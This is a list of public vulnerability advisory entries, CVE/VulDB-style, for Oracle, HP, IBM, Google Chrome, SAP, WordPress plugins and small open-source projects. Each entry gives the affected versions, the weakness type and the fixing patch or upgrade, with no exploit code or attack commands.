Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 and 3.1.2, and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.1.0, 12.1.2.0, and 12.1.3.0, allows remote attackers to affect integrity via unknown vectors related to Java Server Faces.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.54 allows remote attackers to affect integrity via unknown vectors related to Fluid Core.
Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.23 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in Oracle Java SE 7u80 and 8u45, JavaFX 2.2.80, and Java SE Embedded 7u75 and 8u33 allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote authenticated users to affect integrity via unknown vectors related to Input validation.
Unspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Partition.
Unspecified vulnerability in Oracle Sun Solaris 3.3 and 4.2 allows local users to affect availability via unknown vectors related to DevFS.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 12.0.6, 12.1.3, and 12.2.3 allows remote attackers to affect confidentiality via unknown vectors related to Portal.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.3, and 12.2.4 allows remote attackers to affect integrity via unknown vectors related to Popup windows.
Unspecified vulnerability in the Oracle Commerce Guided Search / Oracle Commerce Experience Manager component in Oracle Commerce Platform 3.0.2, 3.1.1, 3.1.2, 11.0, and 11.1 allows remote attackers to affect confidentiality via unknown vectors related to Content Acquisition System.
Unspecified vulnerability in the Oracle Endeca Information Discovery Studio component in Oracle Fusion Middleware 2.2.2, 2.3, 2.4, 3.0, and 3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Integrator, a different vulnerability than CVE-2015-2602, CVE-2015-2603, CVE-2015-2604, CVE-2015-2605, and CVE-2015-4745.
Unspecified vulnerability in the Oracle Endeca Information Discovery Studio component in Oracle Fusion Middleware 2.2.2, 2.3, 2.4, 3.0, and 3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Integrator, a different vulnerability than CVE-2015-2602, CVE-2015-2603, CVE-2015-2604, CVE-2015-2606, and CVE-2015-4745.
Unspecified vulnerability in the Oracle Endeca Information Discovery Studio component in Oracle Fusion Middleware 2.2.2, 2.3, 2.4, 3.0, and 3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Integrator, a different vulnerability than CVE-2015-2602, CVE-2015-2603, CVE-2015-2605, CVE-2015-2606, and CVE-2015-4745.
Unspecified vulnerability in the Oracle Endeca Information Discovery Studio component in Oracle Fusion Middleware 2.2.2, 2.3, 2.4, 3.0, and 3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Integrator, a different vulnerability than CVE-2015-2602, CVE-2015-2604, CVE-2015-2605, CVE-2015-2606, and CVE-2015-4745.
Unspecified vulnerability in the Oracle Endeca Information Discovery Studio component in Oracle Fusion Middleware 2.2.2, 2.3, 2.4, 3.0, and 3.1 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Integrator, a different vulnerability than CVE-2015-2603, CVE-2015-2604, CVE-2015-2605, CVE-2015-2606, and CVE-2015-4745.
Unspecified vulnerability in the Siebel Core - Server OM Svcs component in Oracle Siebel CRM 8.1.1, 8.2.2, and 15.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the RDBMS Scheduler component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the mobile app in Oracle Business Intelligence Enterprise Edition in Oracle Fusion Middleware before 11.1.1.7.0 (11.6.39) allows remote authenticated users to affect integrity via unknown vectors related to Mobile - iPad.
Unspecified vulnerability in Oracle Java SE 7u80 and 8u45 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Install.
Unspecified vulnerability in Oracle Java SE 7u80 allows remote attackers to affect integrity via unknown vectors related to Hotspot.
Unspecified vulnerability in the Oracle OLAP component in Oracle Database Server 12.1.0.1 and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 4.0.32, 4.1.40, 4.2.32, and 4.3.30 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Configuration Service.
Unspecified vulnerability in the Hyperion Enterprise Performance Management Architect component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote authenticated users to affect integrity via unknown vectors related to Security, a different vulnerability than CVE-2015-2584.
Unspecified vulnerability in the PeopleSoft Enterprise Portal - Interaction Hub component in Oracle PeopleSoft Products 9.1.00 allows remote authenticated users to affect integrity via unknown vectors related to Enterprise Portal.
Unspecified vulnerability in Oracle Java SE 6u95, 7u80, and 8u45, and Java SE Embedded 7u75 and 8u33 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2015-4732.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 4.2.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 5.0 allows remote authenticated users to affect availability via unknown vectors.
Unspecified vulnerability in the Hyperion Enterprise Performance Management Architect component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote authenticated users to affect integrity via unknown vectors related to Security, a different vulnerability than CVE-2015-2592.
Unspecified vulnerability in the Data Store component in Oracle Berkeley DB 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, and 12.1.6.0.35 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2015-2624, CVE-2015-2626, CVE-2015-2640, CVE-2015-2654, CVE-2015-2656, CVE-2015-4754, CVE-2015-4764, CVE-2015-4775, CVE-2015-4776, CVE-2015-4777, CVE-2015-4778, CVE-2015-4780, CVE-2015-4781, CVE-2015-4782, CVE-2015-4783, CVE-2015-4784, CVE-2015-4785, CVE-2015-4786, CVE-2015-4787, CVE-2015-4789, and CVE-2015-4790.
Unspecified vulnerability in the Oracle Secure Global Desktop component in Oracle Virtualization 5.1 and 5.2 allows remote attackers to affect confidentiality and availability via unknown vectors related to JServer.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Accounting commands.
Unspecified vulnerability in the MySQL Utilities component in Oracle MySQL 1.5.1 and earlier, when running on Windows, allows local users to affect integrity via unknown vectors related to Installation.
Unspecified vulnerability in the MySQL Connectors component in Oracle MySQL 5.1.34 and earlier allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Connector/J.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality via unknown vectors related to Text Utilities.
Unspecified vulnerability in the Oracle Hyperion Smart View for Office component in Oracle Hyperion 11.1.2.5.216 and earlier, when running on Windows, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.
Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer.
Unspecified vulnerability in the Oracle Demand Planning component in Oracle Supply Chain Products Suite 11.5.10, 12.0, 12.1, and 12.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in Oracle MySQL Server 5.5.41 and earlier, and 5.6.22 and earlier, allows remote attackers to affect availability via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Security : Privileges.
Unspecified vulnerability in the Oracle Installed Base component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors related to Create Item Instance.
The cache handler in MyBB (aka MyBulletinBoard) before 1.8.4 does not properly check the encoding of input to the var_export function, which allows attackers to have an unspecified impact via unknown vectors.
A JSON library in MyBB (aka MyBulletinBoard) before 1.8.4 allows remote attackers to obtain the installation path via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Admin Control Panel (ACP) login in MyBB (aka MyBulletinBoard) before 1.8.4 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.1.0.21, as used in Google Chrome before 41.0.2272.76, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.
Multiple cross-site request forgery (CSRF) vulnerabilities in Issuetracker phpBugTracker before 1.7.0 allow remote attackers to hijack the authentication of users for requests that cause an unspecified impact via unknown parameters.
Unspecified vulnerability in HP Operations Manager i (OMi) 9.22, 9.23, 9.24, 9.25, 10.00, and 10.01 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Intelligent Provisioning 1.00 through 1.62(a), 2.00, and 2.10 allows remote attackers to execute arbitrary code via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) before 7.5.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the execve system-call implementation in HP HP-UX B.11.11, B.11.23, and B.11.31 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP WebInspect 7.x through 10.4 before 10.4 update 1 allows remote authenticated users to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in Easy Setup Wizard in HP ThinPro Linux 4.1 through 5.1 and Smart Zero Core 4.3 and 4.4 allows local users to bypass intended access restrictions and gain privileges via unknown vectors.
Unspecified vulnerability in HP SiteScope 11.1x before 11.13, 11.2x before 11.24.391, and 11.3x before 11.30.521 allows remote authenticated users to gain privileges via unknown vectors, aka ZDI-CAN-2567.
Unspecified vulnerability in the Secure Pull Print and Security Pull Print components in HP Access Control (AC) Software 12.x through 14.x before 14.1.2 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Storage Data Protector 7.x before 7.03 build 107 allows remote authenticated users to execute arbitrary code or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Capture and Route Software (HPCR) 1.3 before Patch 7, 1.3 FP1 before Patch 1, and 1.4 before Patch 1 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Easy Deploy, as distributed standalone and in HP Easy Tools before 3.0.1.1650, on HP Thin Client t5540, t5740, and t5740e devices and HP Flexible Thin Client t510, t520, t610, t620, and t820 devices allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Easy Deploy, as distributed standalone and in HP Easy Tools before 3.0.1.1650, on HP Thin Client t5540, t5740, and t5740e devices and HP Flexible Thin Client t510, t520, t610, t620, and t820 devices allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Intelligent Provisioning 1.40 through 1.60 on Windows Server 2008 R2 and 2012 allows local users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Operations Orchestration 10.x allows remote attackers to bypass authentication, and obtain sensitive information or modify data, via unknown vectors.
Unspecified vulnerability in Powershell Operations in HP Operations Orchestration 9.x and 10.x allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Integrated Lights-Out (iLO) firmware 2 before 2.27, 3 before 1.82, and 4 before 2.10 allows remote attackers to bypass intended access restrictions or cause a denial of service via unknown vectors.
Cross-site scripting (XSS) vulnerability in unspecified administration pages in the Term Queue module before 6.x-1.1 for Drupal allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in D-Link DCS-931L with firmware 1.04 and earlier allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in IBM QRadar SIEM 7.1 MR2 before Patch 11 IF02 and 7.2.x before 7.2.5 Patch 4 allows remote authenticated users to execute arbitrary commands with root privileges via unknown vectors.
Unspecified vulnerability in Jazz Team Server in Jazz Foundation in IBM Rational Collaborative Lifecycle Management (CLM) 3.x and 4.x before 4.0.7 IF8 and 5.x before 5.0.2 IF10; Rational Quality Manager (RQM) 2.x and 3.x before 3.0.1.6 IF7, 4.x before 4.0.7 IF8, and 5.x before 5.0.2 IF10; Rational Team Concert (RTC) 2.x and 3.x before 3.0.1.6 IF7, 4.x before 4.0.7 IF8, and 5.x before 5.0.2 IF10; Rational Requirements Composer (RRC) 2.x and 3.x before 3.0.1.6 IF7 and 4.0 through 4.0.7; Rational DOORS Next Generation (RDNG) 4.x before 4.0.7 IF8 and 5.x before 5.0.2 IF10; Rational Engineering Lifecycle Manager (RELM) 1.0 through 1.0.0.1, 4.0.3 through 4.0.7, and 5.0 through 5.0.2; Rational Rhapsody Design Manager (DM) 3.0 through 3.0.1, 4.0 through 4.0.7, 5.0 through 5.0.2, and 6.0; and Rational Software Architect Design Manager (DM) 3.0 through 3.0.1, 4.0 through 4.0.7, and 5.0 through 5.0.2 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in the Reference Data Management component in IBM InfoSphere Master Data Management 10.1, 11.0, 11.3 before FP3, and 11.4 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.8.0 and 11.1.1.9.0, and the Oracle Applications Framework component in Oracle E-Business Suite 12.2.3 and 12.2.4, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Portal.
Unspecified vulnerability in IBM Java 8 before SR1 allows remote attackers to cause a denial of service via unknown vectors related to SSL/TLS and the Secure Socket Extension provider.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 10.1.3.5, 11.1.1.7, 11.1.1.9, 12.1.2.0, and 12.1.3.0 allows remote attackers to affect availability via unknown vectors related to Web Listener.
Stack-based buffer overflow in the inet_pton function in network/inet_pton.c in musl libc 0.9.15 through 1.0.4, and 1.1.0 through 1.1.7 allows attackers to have unspecified impact via unknown vectors.
An unspecified action handler in the management console in Symantec Endpoint Protection Manager (SEPM) 12.1 before 12.1-RU6-MP1 allows remote authenticated users to read arbitrary files via unknown vectors.
Unspecified vulnerability in vsftpd 3.0.2 and earlier allows remote attackers to bypass access restrictions via unknown vectors, related to deny_file parsing.
Use-after-free vulnerability in the _zend_shared_memdup function in zend_shared_alloc.c in the OPcache extension in PHP through 5.6.7 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 3.30.33.15, as used in Google Chrome before 40.0.2214.91, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The Dealer Portal in SAP ERP does not properly restrict access, which allows remote attackers to obtain sensitive information, gain privileges, and possibly have other unspecified impact via unknown vectors, aka SAP Note 2000401.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Extended Application Services (XS) in SAP HANA allows remote attackers to inject arbitrary ABAP code via unspecified vectors, aka SAP Note 2098906.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in SAP Adaptive Server Enterprise (Sybase ASE) allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Note 2113333.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Google Chrome before 45.0.2454.85 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 44.0.2403.89 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 42.0.2311.135 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 42.0.2311.90 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Skia, as used in Google Chrome before 42.0.2311.90, allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 41.0.2272.76 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 40.0.2214.111 on Windows, OS X, and Linux and before 40.0.2214.109 on Android allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 40.0.2214.91 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Privoxy before 3.0.22 allows remote attackers to cause a denial of service (file descriptor consumption) via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The certificate verification functions in the HNDS service in Swisscom Centro Grande (ADB) DSL routers with firmware before 6.14.00 allows remote attackers to access the management functions via unknown vectors.
A vulnerability classified as problematic was found in Thimo Grauerholz WP-Spreadplugin up to 3.8.6.1 on WordPress. This vulnerability affects unknown code of the file spreadplugin.php. The manipulation of the argument Spreadplugin leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 3.8.6.6 is able to address this issue. The name of the patch is a9b9afc641854698e80aa5dd9ababfc8e0e57d69. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-261676.
A vulnerability was found in planet-freo up to 20150116 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/inc/auth.inc.php. The manipulation of the argument auth leads to incorrect comparison. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 6ad38c58a45642eb8c7844e2f272ef199f59550d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-252716.
A vulnerability was found in PlusCaptcha Plugin up to 2.0.6 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.14 is able to address this issue. The patch is identified as 1274afc635170daafd38306487b6bb8a01f78ecd. It is recommended to upgrade the affected component. VDB-248954 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Easy2Map Photos Plugin 1.0.1 on WordPress. This vulnerability affects unknown code. The manipulation leads to sql injection. The attack can be initiated remotely. Upgrading to version 1.1.0 is able to address this issue. The patch is identified as 503d9ee2482d27c065f78d9546f076a406189908. It is recommended to upgrade the affected component. VDB-241318 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in WP Ultimate CSV Importer Plugin 3.7.2 on WordPress. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 3.7.3 is able to address this issue. The identifier of the patch is 13c30af721d3f989caac72dd0f56cf0dc40fad7e. It is recommended to upgrade the affected component. The identifier VDB-241317 was assigned to this vulnerability.
A vulnerability was found in wp-donate Plugin up to 1.4 on WordPress. It has been classified as critical. This affects an unknown part of the file includes/donate-display.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. Upgrading to version 1.5 is able to address this issue. The identifier of the patch is 019114cb788d954c5d1b36d6c62418619e93a757. It is recommended to upgrade the affected component. The identifier VDB-234249 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Gravity Forms DPS PxPay Plugin up to 1.4.2 on WordPress. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.4.3 is able to address this issue. The name of the patch is 5966a5e6343e3d5610bdfa126a5cfbae95e629b6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230664.
A vulnerability was found in Video Playlist and Gallery Plugin up to 1.136 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality of the file wp-media-cincopa.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 1.137 is able to address this issue. The name of the patch is ee28e91f4d5404905204c43b7b84a8ffecad932e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230264.
A vulnerability was found in Simplr Registration Form Plus+ Plugin up to 2.3.4 on WordPress and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is d588446844dd49232ab400ef213ff5b92121c33e. It is recommended to upgrade the affected component. The identifier VDB-230153 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Icons for Features Plugin 1.0.0 on WordPress. Affected by this issue is some unknown functionality of the file classes/class-icons-for-features-admin.php. The manipulation of the argument redirect_url leads to open redirect. The attack may be launched remotely. Upgrading to version 1.0.1 is able to address this issue. The name of the patch is 63124c021ae24b68e56872530df26eb4268ad633. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227756.
A vulnerability, which was classified as problematic, was found in InternalError503 Forget It up to 1.3. This affects an unknown part of the file js/settings.js. The manipulation of the argument setForgetTime with the input 0 leads to infinite loop. It is possible to launch the attack on the local host. Upgrading to version 1.4 is able to address this issue. The patch is named adf0c7fd59b9c935b4fd675c556265620124999c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-226119.
A vulnerability, which was classified as critical, has been found in Freshdesk Plugin 1.7 on WordPress. Affected by this issue is some unknown functionality. The manipulation leads to open redirect. The attack may be launched remotely. Upgrading to version 1.8 is able to address this issue. The patch is identified as 2aaecd4e0c7c6c1dc4e6a593163d5f7aa0fa5d5b. It is recommended to upgrade the affected component. VDB-226118 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Google Analytics Top Content Widget Plugin up to 1.5.6 on WordPress. Affected by this vulnerability is an unknown functionality of the file class-tgm-plugin-activation.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.5.7 is able to address this issue. The identifier of the patch is 25bb1dea113716200a6f0f3135801d84a7a65540. It is recommended to upgrade the affected component. The identifier VDB-226117 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Dynamic Widgets Plugin up to 1.5.10 on WordPress. This issue affects some unknown processing of the file classes/dynwid_class.php. The manipulation leads to sql injection. The attack may be initiated remotely. Upgrading to version 1.5.11 is able to address this issue. The identifier of the patch is d0a19c6efcdc86d7093b369bc9e29a0629e57795. It is recommended to upgrade the affected component. The identifier VDB-225353 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in woo-popup Plugin up to 1.2.2 on WordPress. This affects an unknown part of the file admin/class-woo-popup-admin.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.3.0 is able to address this issue. The patch is named 7c76ac78f3e16015991b612ff4fa616af4ce9292. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222327.
A vulnerability, which was classified as problematic, has been found in Landing Pages Plugin up to 1.8.7 on WordPress. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.8.8 is able to address this issue. The name of the patch is c8e22c1340c11fedfb0a0a67ea690421bdb62b94. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-222320.
A vulnerability classified as problematic has been found in flame.js. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named e6c49b5f6179e31a534b7c3264e1d36aa99728ac. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-222291.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in UpThemes Theme DesignFolio Plus 1.2 on WordPress and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 53f6ae62878076f99718e5feb589928e83c879a9. It is recommended to apply a patch to fix this issue. The identifier VDB-221809 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability, which was classified as critical, was found in OpenCycleCompass server-php. Affected is an unknown function of the file api1/login.php. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is fa0d9bcf81c711a88172ad0d37a842f029ac3782. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221808.
A vulnerability was found in GoPistolet. It has been declared as problematic. This vulnerability affects unknown code of the component MTA. The manipulation leads to denial of service. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as b91aa4674d460993765884e8463c70e6d886bc90. It is recommended to apply a patch to fix this issue. VDB-221506 is the identifier assigned to this vulnerability.
A vulnerability was found in arnoldle submitByMailPlugin 1.0b2.9 and classified as problematic. This issue affects some unknown processing of the file edit_list.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 1.0b2.9a is able to address this issue. The patch is named a739f680a1623d22f52ff1371e86ca472e63756f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221495.
A vulnerability was found in NREL api-umbrella-web 0.7.1. It has been classified as problematic. This affects an unknown part of the component Admin Data Table Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 0.8.0 is able to address this issue. The patch is named f53a9fb87e10c457f0f3dd4f2af24d3b2f21b3ca. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221487.
A vulnerability classified as problematic was found in NREL api-umbrella-web 0.7.1. This vulnerability affects unknown code of the component Flash Message Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.0 is able to address this issue. The name of the patch is bcc0e922c61d30367678c8f17a435950969315cd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-220060.
A vulnerability was found in gitter-badger ezpublish-modern-legacy. It has been rated as problematic. This issue affects some unknown processing of the file kernel/user/forgotpassword.php. The manipulation leads to weak password recovery. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 1.0 is able to address this issue. The patch is named 5908d5ee65fec61ce0e321d586530461a210bf2a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218951.
A vulnerability was found in copperwall Twiddit. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation leads to sql injection. The identifier of the patch is 2203d4ce9810bdaccece5c48ff4888658a01acfc. It is recommended to apply a patch to fix this issue. The identifier VDB-218897 was assigned to this vulnerability.
A vulnerability was found in oznetmaster SSharpSmartThreadPool. It has been classified as problematic. This affects an unknown part of the file SSharpSmartThreadPool/SmartThreadPool.cs. The manipulation leads to race condition within a thread. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 0e58073c831093aad75e077962e9fb55cad0dc5f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218463.
A vulnerability was found in VictorFerraresi pokemon-database-php. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The patch is named dd0e1e6cdf648d6a3deff441f515bcb1d7573d68. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218455.
A vulnerability, which was classified as problematic, was found in galaxy-data-resource up to 14.10.0. This affects an unknown part of the component Command Line Template. The manipulation leads to injection. Upgrading to version 14.10.1 is able to address this issue. The patch is named 50d65f45d3f5be5d1fbff2e45ac5cec075f07d42. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218451.
A vulnerability was found in evandro-machado Trabalho-Web2. It has been classified as critical. This affects an unknown part of the file src/java/br/com/magazine/dao/ClienteDAO.java. The manipulation leads to sql injection. The patch is named f59ac954625d0a4f6d34f069a2e26686a7a20aeb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218427.
A vulnerability was found in MNBikeways database and classified as critical. This issue affects some unknown processing of the file Data/views.py. The manipulation of the argument id1/id2 leads to sql injection. The identifier of the patch is 829a027aca7c17f5a7ec1addca8dd5d5542f86ac. It is recommended to apply a patch to fix this issue. The identifier VDB-218417 was assigned to this vulnerability.
A vulnerability has been found in s134328 Webapplication-Veganguide and classified as problematic. This vulnerability affects unknown code of the file p05-integration/app/shared/api/apiService.js. The manipulation of the argument country/city leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 2aa760fa4e779e40a28206a32ac22ac10356f519. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218416.
A vulnerability, which was classified as problematic, was found in Wikisource Category Browser. This affects an unknown part of the file index.php. The manipulation of the argument lang leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named 764f4e8ce3f9242637df77530c70ae8a2ec4b6a1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218415.
A vulnerability was found in Little Apps Little Software Stats. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file inc/class.securelogin.php of the component Password Reset Handler. The manipulation leads to improper access controls. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 0.2 is able to address this issue. The identifier of the patch is 07ba8273a9311d1383f3686ac7cb32f20770ab1e. It is recommended to upgrade the affected component. The identifier VDB-218401 was assigned to this vulnerability.
